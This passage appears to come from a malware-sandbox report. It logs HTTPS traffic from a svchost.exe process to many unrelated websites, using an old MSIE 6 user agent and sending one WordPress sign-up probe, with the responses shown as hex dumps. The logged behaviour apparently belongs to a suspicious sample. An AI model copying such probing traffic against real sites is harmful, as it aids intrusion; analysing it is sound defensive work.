{"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 7abbc887bc1335f0-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
2023-03-22 04:45:07 UTC	715	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.5	50206	172.67.156.49	443	C:\Windows\SysWOW64\svchost.exe

Timestamp	kBytes transferred	Direction	Data
2023-03-22 04:44:27 UTC	61	OUT	GET / HTTP/1.1 Accept: * Accept-Language: en-us Connection: keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Cache-Control: no-cache Host: orlyhotel.com
2023-03-22 04:44:27 UTC	61	IN	HTTP/1.1 500 Internal Server Error Date: Wed, 22 Mar 2023 04:44:27 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Cache-Control: max-age=0, no-store, no-cache, must-revalidate Expires: Wed, 22 Mar 2023 04:34:20 GMT Content-Language: en Last-Modified: Wed, 22 Mar 2023 04:34:20 GMT X-Frame-Options: SAMEORIGIN Vary: Accept-Language Set-Cookie: django_language=en; expires=Thu, 21-Mar-2024 04:34:20 GMT; Max-Age=31536000; Path=/ CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=RHyVC9FOZILqrs2WYRhNU%2FvZhgbOe9oGaTYJKsN25Aj6tIkwoxTjoGUCVO9hBwDyq581uHaiVRq8zJZfAB%2BW8Bv6sql%2F2qTKtiDBsT8g0nPCoSLXvxO0iarwQCBB%2FM2q"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 7abbc791b82230c6-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
2023-03-22 04:44:27 UTC	62	IN	Data Raw: 31 62 0d 0a 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 20 28 35 30 30 29 3c 2f 68 31 3e 0d 0a Data Ascii: 1b<h1>Server Error (500)</h1>
2023-03-22 04:44:27 UTC	62	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
40	192.168.2.5	62529	138.201.65.187	443	C:\Windows\SysWOW64\svchost.exe

Timestamp	kBytes transferred	Direction	Data
2023-03-22 04:45:07 UTC	563	OUT	GET / HTTP/1.1 Accept: * Accept-Language: en-us Connection: keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Cache-Control: no-cache Host: www.diamir.de
2023-03-22 04:45:07 UTC	564	IN	HTTP/1.1 403 Forbidden Server: nginx Date: Wed, 22 Mar 2023 04:45:07 GMT Content-Type: text/html Content-Length: 548 Connection: close Vary: Accept-Encoding Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
2023-03-22 04:45:07 UTC	565	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
41	192.168.2.5	62500	35.214.171.193	443	C:\Windows\SysWOW64\svchost.exe

Timestamp	kBytes transferred	Direction	Data
2023-03-22 04:45:07 UTC	563	OUT	GET / HTTP/1.1 Accept: * Accept-Language: en-us Connection: keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Cache-Control: no-cache Host: flamingorecordings.com
2023-03-22 04:45:07 UTC	565	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 22 Mar 2023 04:45:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding SG-F-Cache: HIT X-Httpd-Modphp: 1 Host-Header: 8441280b0c35cbc1147f8ba998a563a7 X-Proxy-Cache: HIT
2023-03-22 04:45:07 UTC	566	IN	Data Raw: 38 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 76 69 65 77 70 6f 72 74 27 20 63 6f 6e 74 65 6e 74 3d 27 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 27 20 2f 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 27 20 63 6f 6e 74 65 6e 74 3d 27 49 45 3d 65 64 67 65 27 20 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 20 2f 3e 3c 74 69 74 6c Data Ascii: 8000<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8" /><meta name='viewport' content='width=device-width, initial-scale=1.0' /><meta http-equiv='X-UA-Compatible' content='IE=edge' /><link rel="profile" href="https://gmpg.org/xfn/11" /><titl
2023-03-22 04:45:07 UTC	581	IN	Data Raw: 5f 31 32 30 30 70 78 2d 33 30 30 78 33 30 30 2e 70 6e 67 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6d 73 61 70 70 6c 69 63 61 74 69 6f 6e 2d 54 69 6c 65 49 6d 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 66 6c 61 6d 69 6e 67 6f 72 65 63 6f 72 64 69 6e 67 73 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 31 37 2f 31 31 2f 46 6c 61 6d 69 6e 67 6f 5f 4c 6f 67 6f 5f 53 74 69 63 6b 65 72 5f 42 69 72 64 5f 31 32 30 30 70 78 2d 33 30 30 78 33 30 30 2e 70 6e 67 22 20 2f 3e 20 3c 73 74 79 6c 65 20 69 64 3d 22 77 70 2d 63 75 73 74 6f 6d 2d 63 73 73 22 3e 20 2e 66 6c 2d 70 6f 73 74 2d 67 72 69 64 2d 70 6f 73 74 7b 0a 20 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 0a 7d 0a 2e 72 65 6c 65 61 73 65 7b 0a 20 70 6f 73 69 Data Ascii: _1200px-300x300.png" /><meta name="msapplication-TileImage" content="https://flamingorecordings.com/wp-content/uploads/2017/11/Flamingo_Logo_Sticker_Bird_1200px-300x300.png" /> <style id="wp-custom-css"> .fl-post-grid-post{ border:none;}.release{ posi
2023-03-22 04:45:07 UTC	597	IN	Data Raw: 74 79 70 65 3d 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 50 65 72 73 6f 6e 22 3e 3c 6d 65 74 61 20 69 74 65 6d 70 72 6f 70 3d 22 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 66 6c 61 6d 69 6e 67 6f 72 65 63 6f 72 64 69 6e 67 73 2e 63 6f 6d 2f 61 75 74 68 6f 72 2f 61 64 6d 69 6e 2f 22 20 2f 3e 3c 6d 65 74 61 20 69 74 65 6d 70 72 6f 70 3d 22 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 61 64 6d 69 6e 22 20 2f 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 69 74 65 6d 70 72 6f 70 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 53 74 61 74 69 73 74 69 63 22 20 69 74 65 6d 73 63 6f 70 65 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 49 6e 74 65 72 61 63 74 69 6f 6e 43 6f 75 6e 74 65 72 22 3e 3c 6d Data Ascii: type="https://schema.org/Person"><meta itemprop="url" content="https://flamingorecordings.com/author/admin/" /><meta itemprop="name" content="admin" /></div><div itemprop="interactionStatistic" itemscope itemtype="https://schema.org/InteractionCounter"><m
2023-03-22 04:45:07 UTC	613	IN	Data Raw: 74 65 6d 74 79 70 65 3d 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 4f 72 67 61 6e 69 7a 61 74 69 6f 6e 22 3e 3c 6d 65 74 61 20 69 74 65 6d 70 72 6f 70 3d 22 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 46 6c 61 6d 69 6e 67 6f 20 52 65 63 6f 72 64 69 6e 67 73 22 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 69 74 65 6d 73 63 6f 70 65 20 69 74 65 6d 70 72 6f 70 3d 22 61 75 74 68 6f 72 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 50 65 72 73 6f 6e 22 3e 3c 6d 65 74 61 20 69 74 65 6d 70 72 6f 70 3d 22 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 66 6c 61 6d 69 6e 67 6f 72 65 63 6f 72 64 69 6e 67 73 2e 63 6f 6d 2f 61 75 74 68 6f 72 2f 61 64 6d 69 6e 2f 22 20 2f 3e 3c 6d 65 74 61 20 69 Data Ascii: temtype="https://schema.org/Organization"><meta itemprop="name" content="Flamingo Recordings"></div><div itemscope itemprop="author" itemtype="https://schema.org/Person"><meta itemprop="url" content="https://flamingorecordings.com/author/admin/" /><meta i
2023-03-22 04:45:07 UTC	629	IN	Data Raw: 6e 62 6b 4f 58 5f 68 6c 7a 6e 72 64 42 57 48 52 77 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 22 20 3e 20 3c 69 20 63 6c 61 73 73 3d 22 66 61 62 20 66 61 2d 79 6f 75 74 75 62 65 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 3e 3c 2f 69 3e 20 3c 2f 61 3e 20 3c 2f 73 70 61 6e 3e 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 66 6c 2d 69 63 6f 6e 22 3e 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 69 6e 73 74 61 67 72 61 6d 2e 63 6f 6d 2f 66 6c 61 6d 69 6e 67 6f 72 65 63 6f 72 64 69 6e 67 73 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 22 20 3e 20 3c 69 20 63 6c 61 73 73 3d 22 66 61 62 20 66 61 2d 69 6e 73 74 61 67 72 61 6d 22 20 Data Ascii: nbkOX_hlznrdBWHRw" target="_blank" rel="noopener" > <i class="fab fa-youtube" aria-hidden="true"></i> </a> </span> <span class="fl-icon"> <a href="https://www.instagram.com/flamingorecordings/" target="_blank" rel="noopener" > <i class="fab fa-instagram"

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
42	192.168.2.5	62578	83.223.113.46	443	C:\Windows\SysWOW64\svchost.exe

Timestamp	kBytes transferred	Direction	Data
2023-03-22 04:45:07 UTC	565	OUT	GET /wp-signup.php?new=magicomm.co.uk HTTP/1.1 Accept: * Accept-Language: en-us Connection: keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Cache-Control: no-cache Host: dataform.co.uk
2023-03-22 04:45:08 UTC	717	IN	HTTP/1.1 200 OK Cache-Control: must-revalidate, no-cache, max-age=0 Keep-Alive: timeout=2, max=97 Content-Length: 48938 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT Vary: Accept-Encoding Server: Apache Access-Control-Allow-Headers: mobileappversionnumber, x-requested-with Access-Control-Allow-Origin: * X-Powered-By: PHP/7.0.29 X-UA-Compatible: IE=EmulateIE10 X-Frame-Options: SAMEORIGIN X-Mod-Pagespeed: 1.9.32.14-0 Strict-Transport-Security: max-age=10886400 X-Powered-By: ASP.NET Date: Wed, 22 Mar 2023 04:45:08 GMT Connection: close
2023-03-22 04:45:08 UTC	717	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 21 28 49 45 20 36 29 20 7c 20 21 28 49 45 20 37 29 20 7c 20 21 28 49 45 20 38 29 20 20 5d 3e 3c 21 2d 2d 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0a 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 0a 09 20 20 20 20 3c Data Ascii: <!DOCTYPE html>...[if !(IE 6) \| !(IE 7) \| !(IE 8) ]>...><html lang="en-US" class="no-js">...<![endif]--><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=0"> <
2023-03-22 04:45:08 UTC	720	IN	Data Raw: 61 67 22 3a 72 65 74 75 72 6e 20 73 28 5b 35 35 33 35 36 2c 35 36 38 32 36 2c 35 35 33 35 36 2c 35 36 38 31 39 5d 2c 5b 35 35 33 35 36 2c 35 36 38 32 36 2c 38 32 30 33 2c 35 35 33 35 36 2c 35 36 38 31 39 5d 29 3f 21 31 3a 21 73 28 5b 35 35 33 35 36 2c 35 37 33 33 32 2c 35 36 31 32 38 2c 35 36 34 32 33 2c 35 36 31 32 38 2c 35 36 34 31 38 2c 35 36 31 32 38 2c 35 36 34 32 31 2c 35 36 31 32 38 2c 35 36 34 33 30 2c 35 36 31 32 38 2c 35 36 34 32 33 2c 35 36 31 32 38 2c 35 36 34 34 37 5d 2c 5b 35 35 33 35 36 2c 35 37 33 33 32 2c 38 32 30 33 2c 35 36 31 32 38 2c 35 36 34 32 33 2c 38 32 30 33 2c 35 36 31 32 38 2c 35 36 34 31 38 2c 38 32 30 33 2c 35 36 31 32 38 2c 35 36 34 32 31 2c 38 32 30 33 2c 35 36 31 32 38 2c 35 36 34 33 30 2c 38 32 30 33 2c 35 36 31 32 38 2c Data Ascii: ag":return s([55356,56826,55356,56819],[55356,56826,8203,55356,56819])?!1:!s([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,
2023-03-22 04:45:08 UTC	728	IN	Data Raw: 30 30 2f 73 76 67 27 20 76 69 65 77 42 6f 78 3d 27 30 20 30 20 33 32 20 33 32 27 20 77 69 64 74 68 3d 27 37 32 27 20 68 65 69 67 68 74 3d 27 37 32 27 20 66 69 6c 6c 3d 27 72 67 62 61 25 32 38 35 31 25 32 43 35 31 25 32 43 35 31 25 32 43 30 2e 32 35 25 32 39 27 25 33 45 20 20 20 25 33 43 70 61 74 68 20 74 72 61 6e 73 66 6f 72 6d 3d 27 74 72 61 6e 73 6c 61 74 65 28 32 29 27 20 64 3d 27 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 27 25 33 45 20 20 20 20 20 20 25 33 43 61 6e 69 6d 61 74 65 20 61 74 74 72 69 62 75 74 65 4e 61 6d 65 3d 27 64 27 20 76 61 6c 75 65 73 3d 27 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 3b 20 4d 30 20 34 20 56 32 38 20 48 34 20 56 34 7a 3b 20 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 3b 20 4d 30 20 31 32 20 56 Data Ascii: 00/svg' viewBox='0 0 32 32' width='72' height='72' fill='rgba%2851%2C51%2C51%2C0.25%29'%3E %3Cpath transform='translate(2)' d='M0 12 V20 H4 V12z'%3E %3Canimate attributeName='d' values='M0 12 V20 H4 V12z; M0 4 V28 H4 V4z; M0 12 V20 H4 V12z; M0 12 V
2023-03-22 04:45:08 UTC	736	IN	Data Raw: 6c 6c 6f 77 65 64 20 74 6f 20 75 70 6c 6f 61 64 20 69 73 20 30 2e 22 2c 22 6e 65 65 64 73 5f 62 73 34 22 3a 22 22 2c 22 6f 6e 65 5f 6f 70 74 69 6f 6e 22 3a 22 43 68 6f 6f 73 65 20 61 6e 20 6f 70 74 69 6f 6e 22 2c 22 6f 6e 65 5f 6f 72 5f 6d 6f 72 65 5f 6f 70 74 69 6f 6e 22 3a 22 43 68 6f 6f 73 65 20 6f 6e 65 20 6f 72 20 6d 6f 72 65 20 6f 70 74 69 6f 6e 73 22 2c 22 70 65 72 6d 61 6c 69 6e 6b 73 22 3a 22 31 22 2c 22 72 65 63 61 70 74 63 68 61 5f 73 69 74 65 5f 6b 65 79 22 3a 22 22 2c 22 72 65 63 61 70 74 63 68 61 5f 76 65 72 73 69 6f 6e 22 3a 22 76 32 22 2c 22 72 65 70 6c 69 65 73 5f 74 6f 5f 6c 6f 61 64 22 3a 22 35 22 2c 22 72 65 70 6c 79 5f 6c 61 62 65 6c 22 3a 22 52 65 70 6c 79 22 2c 22 73 65 61 72 63 68 5f 70 6c 61 63 65 68 6f 6c 64 65 72 22 3a 22 53 65 Data Ascii: llowed to upload is 0.","needs_bs4":"","one_option":"Choose an option","one_or_more_option":"Choose one or more options","permalinks":"1","recaptcha_site_key":"","recaptcha_version":"v2","replies_to_load":"5","reply_label":"Reply","search_placeholder":"Se
2023-03-22 04:45:08 UTC	744	IN	Data Raw: 72 6f 75 6e 64 3a 23 66 66 66 66 65 30 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 65 36 64 62 35 35 7d 3c 2f 73 74 79 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 50 6f 77 65 72 65 64 20 62 79 20 53 6c 69 64 65 72 20 52 65 76 6f 6c 75 74 69 6f 6e 20 35 2e 34 2e 38 20 2d 20 72 65 73 70 6f 6e 73 69 76 65 2c 20 4d 6f 62 69 6c 65 2d 46 72 69 65 6e 64 6c 79 20 53 6c 69 64 65 72 20 50 6c 75 67 69 6e 20 66 6f 72 20 57 6f 72 64 50 72 65 73 73 20 77 69 74 68 20 63 6f 6d 66 6f 72 74 61 62 6c 65 20 64 72 61 67 20 61 6e 64 20 64 72 6f 70 20 69 6e 74 65 72 66 61 63 65 2e 22 2f 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 64 6f 63 75 6d Data Ascii: round:#ffffe0;border:1px solid #e6db55}</style><meta name="generator" content="Powered by Slider Revolution 5.4.8 - responsive, Mobile-Friendly Slider Plugin for WordPress with comfortable drag and drop interface."/><script type="text/javascript">docum
2023-03-22 04:45:08 UTC	752	IN	Data Raw: 6d 6f 62 69 6c 65 2d 6d 65 6e 75 2d 69 63 6f 6e 27 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 27 64 74 2d 6d 6f 62 69 6c 65 2d 68 65 61 64 65 72 27 3e 0a 09 3c 75 6c 20 69 64 3d 22 6d 6f 62 69 6c 65 2d 6d 65 6e 75 22 20 63 6c 61 73 73 3d 22 6d 6f 62 69 6c 65 2d 6d 61 69 6e 2d 6e 61 76 22 20 72 6f 6c 65 3d 22 6d 65 6e 75 22 3e 0a 09 09 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 68 6f 6d 65 20 63 75 72 72 65 6e 74 2d 6d 65 6e 75 2d 69 74 65 6d 20 70 61 67 65 5f 69 74 65 6d 20 70 61 67 65 2d 69 74 65 6d 2d 31 36 20 63 Data Ascii: mobile-menu-icon'><span></span></div><div class='dt-mobile-header'><ul id="mobile-menu" class="mobile-main-nav" role="menu"><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home current-menu-item page_item page-item-16 c
2023-03-22 04:45:08 UTC	760	IN	Data Raw: 72 20 6d 79 3d 6e 6f 77 2e 67 65 74 54 69 6d 65 28 29 3b 6e 6f 77 3d 6e 65 77 20 44 61 74 65 28 6d 79 2d 64 69 66 66 6d 73 29 3b 74 69 6d 65 72 49 44 3d 73 65 74 54 69 6d 65 6f 75 74 28 27 73 68 6f 77 74 69 6d 65 28 29 27 2c 31 30 30 30 30 29 3b 74 69 6d 65 72 52 75 6e 6e 69 6e 67 3d 74 72 75 65 3b 7d 0a 66 75 6e 63 74 69 6f 6e 20 73 74 61 72 74 63 6c 6f 63 6b 28 29 7b 73 74 6f 70 63 6c 6f 63 6b 28 29 3b 73 68 6f 77 74 69 6d 65 28 29 3b 7d 0a 76 61 72 20 74 69 6d 65 72 49 44 3d 6e 75 6c 6c 3b 76 61 72 20 74 69 6d 65 72 52 75 6e 6e 69 6e 67 3d 66 61 6c 73 65 3b 76 61 72 20 78 3d 6e 65 77 20 44 61 74 65 28 29 3b 76 61 72 20 6e 6f 77 3d 78 2e 67 65 74 54 69 6d 65 28 29 3b 76 61 72 20 67 6d 74 3d 31 36 37 39 34 36 30 33 30 37 2a 31 30 30 30 3b 76 61 72 20 64 Data Ascii: r my=now.getTime();now=new Date(my-diffms);timerID=setTimeout('showtime()',10000);timerRunning=true;}function startclock(){stopclock();showtime();}var timerID=null;var timerRunning=false;var x=new Date();var now=x.getTime();var gmt=1679460307*1000;var d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
43	192.168.2.5	62542	75.2.95.235	443	C:\Windows\SysWOW64\svchost.exe

Timestamp	kBytes transferred	Direction	Data
2023-03-22 04:45:07 UTC	677	OUT	GET / HTTP/1.1 Accept: * Accept-Language: en-us Connection: keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Cache-Control: no-cache Host: ldh.la.gov
2023-03-22 04:45:07 UTC	715	IN	HTTP/1.1 406 Not Acceptable Date: Wed, 22 Mar 2023 04:45:07 GMT Content-Type: text/html Content-Length: 1346 Connection: close Server: Microsoft-IIS/10.0 X-Powered-By: ASP.NET
2023-03-22 04:45:07 UTC	715	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 36 20 2d 20 43 6c 69 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>406 - Cli

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
44	192.168.2.5	62560	49.212.235.175	443	C:\Windows\SysWOW64\svchost.exe

Timestamp	kBytes transferred	Direction	Data
2023-03-22 04:45:07 UTC	717	OUT	GET / HTTP/1.1 Accept: * Accept-Language: en-us Connection: keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Cache-Control: no-cache Host: nts-web.net
2023-03-22 04:45:55 UTC	1755	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 22 Mar 2023 04:45:54 GMT Content-Type: text/html Content-Length: 2599149 Connection: close Last-Modified: Tue, 08 Nov 2022 00:53:41 GMT ETag: "27a8ed-5eceaf89b8f40" Accept-Ranges: bytes
2023-03-22 04:45:55 UTC	1756	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 66 62 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 2f 66 62 23 20 77 65 62 73 69 74 65 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 2f 77 65 62 73 69 74 65 23 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 Data Ascii: <!DOCTYPE html><html lang="ja"> <head prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb# website: http://ogp.me/ns/website#"> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="wi
2023-03-22 04:45:55 UTC	2059	IN	Data Raw: 31 36 38 7b 66 69 6c 6c 3a 23 66 35 64 61 32 38 3b 7d 2e 63 6c 73 2d 31 36 30 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 2e 30 34 70 78 3b 7d 2e 63 6c 73 2d 31 36 31 2c 2e 63 6c 73 2d 31 36 32 2c 2e 63 6c 73 2d 31 36 33 7b 66 69 6c 6c 3a 23 39 32 64 31 64 37 3b 7d 2e 63 6c 73 2d 31 36 31 2c 2e 63 6c 73 2d 31 36 35 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 30 2e 39 37 70 78 3b 7d 2e 63 6c 73 2d 31 36 32 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 2e 31 35 70 78 3b 7d 2e 63 6c 73 2d 31 36 33 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 2e 32 35 70 78 3b 7d 2e 63 6c 73 2d 31 36 34 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 2e 35 34 70 78 3b 7d 2e 63 6c 73 2d 31 36 35 7b 66 69 6c 6c 3a 23 65 65 65 39 34 32 3b 7d 2e 63 6c 73 2d 31 36 36 7b 66 69 